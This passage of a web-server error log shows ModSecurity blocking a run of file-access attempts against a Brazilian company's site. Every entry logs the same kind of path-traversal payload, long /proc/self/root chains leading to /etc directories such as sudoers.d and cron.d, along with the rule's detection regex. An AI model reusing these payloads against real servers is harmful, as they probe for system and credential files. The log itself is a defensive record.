"WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDBaTCbgAP5jq5Teg3xAAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:51:02.823387 2026] [:error] [pid 21805:tid 140411741927168] [client 74.7.243.203:37162] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDBrABkC4fWIHEf8H69AAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:51:02.858993 2026] [:error] [pid 21805:tid 140411632822016] [client 74.7.241.46:51184] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDBrABkC4fWIHEf8H69QAAAE0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:51:05.530887 2026] [:error] [pid 10831:tid 140411708356352] [client 74.7.241.46:51192] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDCI6lpbStxTqkSkt3GQAAAkQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:51:06.713196 2026] [:error] [pid 14895:tid 140411540502272] [client 74.7.243.203:37176] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDClajLEzk2WiQ-10dTAAAApg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:51:10.357622 2026] [:error] [pid 21805:tid 140411616036608] [client 74.7.243.203:37190] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDDrABkC4fWIHEf8H6-AAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:51:11.812061 2026] [:error] [pid 15061:tid 140411708356352] [client 74.7.243.203:53128] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDD6TCbgAP5jq5Teg3yAAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:51:13.175501 2026] [:error] [pid 11972:tid 140411599251200] [client 74.7.243.203:53142] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDEZqj1wV0Si-Okef6WgAAABE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:51:15.714791 2026] [:error] [pid 15568:tid 140411733534464] [client 74.7.243.203:53156] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDE6QpVkWug9HeOt9BlgAAA0E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:51:17.112922 2026] [:error] [pid 21806:tid 140411624429312] [client 74.7.243.203:53168] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDFdSswJuvopo3lOhp7gAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:51:19.508728 2026] [:error] [pid 14895:tid 140411741927168] [client 74.7.243.203:53182] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDF1ajLEzk2WiQ-10dUgAAAoA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:51:21.889380 2026] [:error] [pid 15061:tid 140411741927168] [client 74.7.243.203:52322] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDGaTCbgAP5jq5Teg3zgAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:51:23.382694 2026] [:error] [pid 11972:tid 140411565680384] [client 74.7.243.203:52338] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDG5qj1wV0Si-Okef6YQAAABU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:51:24.778993 2026] [:error] [pid 15061:tid 140411691570944] [client 74.7.243.203:52344] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDHKTCbgAP5jq5Teg30AAAAsY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:51:26.315590 2026] [:error] [pid 10651:tid 140411716749056] [client 74.7.243.203:52356] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDHrysWC90G-1nBrBPzwAAAYM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:51:27.635688 2026] [:error] [pid 10831:tid 140411557287680] [client 74.7.243.203:52366] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDH46lpbStxTqkSkt3IAAAAlY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:51:29.075402 2026] [:error] [pid 10831:tid 140411574073088] [client 74.7.243.203:52372] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDIY6lpbStxTqkSkt3IwAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:51:30.107252 2026] [:error] [pid 10772:tid 140411674785536] [client 74.7.241.46:51204] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDIv9ocpUE4ed4uDz7BgAAAgg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:51:31.367785 2026] [:error] [pid 11972:tid 140411582465792] [client 74.7.243.203:33072] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDI5qj1wV0Si-Okef6ZgAAABM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:51:31.415406 2026] [:error] [pid 21805:tid 140411599251200] [client 74.7.241.46:58882] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDI7ABkC4fWIHEf8H7BAAAAFE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:51:33.923434 2026] [:error] [pid 15568:tid 140411582465792] [client 74.7.241.46:58896] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDJaQpVkWug9HeOt9BmQAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:51:35.343365 2026] [:error] [pid 11972:tid 140411557287680] [client 74.7.241.46:58908] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDJ5qj1wV0Si-Okef6ZwAAABY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
